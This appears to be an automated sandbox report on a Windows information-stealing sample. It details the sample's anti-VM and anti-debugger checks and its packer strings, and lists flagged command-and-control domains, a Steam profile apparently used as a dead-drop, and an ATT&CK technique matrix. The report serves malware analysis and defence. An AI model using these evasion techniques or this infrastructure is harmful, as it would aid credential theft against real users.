    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1F3C24 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 425871 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 1856Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.4.drBinary or memory string: VMware
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000003.2071750566.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2293219794.0000000000B95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: file.exe, 00000000.00000002.2293219794.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(M
    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
    Source: file.exe, 00000000.00000003.2071960309.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2293219794.0000000000B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D00D0 LdrInitializeThunk,0_2_001D00D0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    2
    Process Injection
    24
    Virtualization/Sandbox Evasion
    OS Credential Dumping641
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    2
    Process Injection
    LSASS Memory24
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information
    NTDS223
    System Information Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truetrue
      unknown
      sergei-esenin.com
      104.21.53.8
      truetrue
        unknown
        eaglepawnoy.store
        unknown
        unknowntrue
          unknown
          bathdoomgaz.store
          unknown
          unknowntrue
            unknown
            spirittunek.store
            unknown
            unknowntrue
              unknown
              licendfilteo.site
              unknown
              unknowntrue
                unknown
                studennotediw.store
                unknown
                unknowntrue
                  unknown
                  mobbipenju.store
                  unknown
                  unknowntrue
                    unknown
                    clearancek.site
                    unknown
                    unknowntrue
                      unknown
                      dissapoiznw.store
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        bathdoomgaz.storetrue
                          unknown
                          studennotediw.storetrue
                            unknown
                            clearancek.sitetrue
                              unknown
                              dissapoiznw.storetrue
                                unknown
                                https://steamcommunity.com/profiles/76561199724331900true
                                • URL Reputation: malware
                                unknown
                                spirittunek.storetrue
                                  unknown
                                  licendfilteo.sitetrue
                                    unknown
                                    eaglepawnoy.storetrue
                                      unknown
                                      mobbipenju.storetrue
                                        unknown
                                        https://sergei-esenin.com/apitrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.2071715008.0000000000BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://help.steampowered.com/en/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://steamcommunity.com/market/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://store.steampowered.com/news/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://sergei-esenin.com/file.exe, 00000000.00000003.2072193015.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2293219794.0000000000B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.cloudflare.com/learning/access-mfile.exe, 00000000.00000003.2071750566.0000000000B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://steamcommunity.com/discussions/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://sergei-esenin.com/2file.exe, 00000000.00000003.2072193015.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://store.steampowered.com/stats/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://sergei-esenin.com:443/apisfile.exe, 00000000.00000002.2293219794.0000000000B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://steamcommunity.com/workshop/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://store.steampowered.com/legal/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://steamcommunity.com/Z~file.exe, 00000000.00000003.2071960309.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://upx.sf.netAmcache.hve.4.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://store.steampowered.com/file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • URL Reputation: malware
                                                                          unknown
                                                                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://sergei-esenin.com/sfile.exe, 00000000.00000002.2293219794.0000000000B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.2071750566.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071715008.0000000000BD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
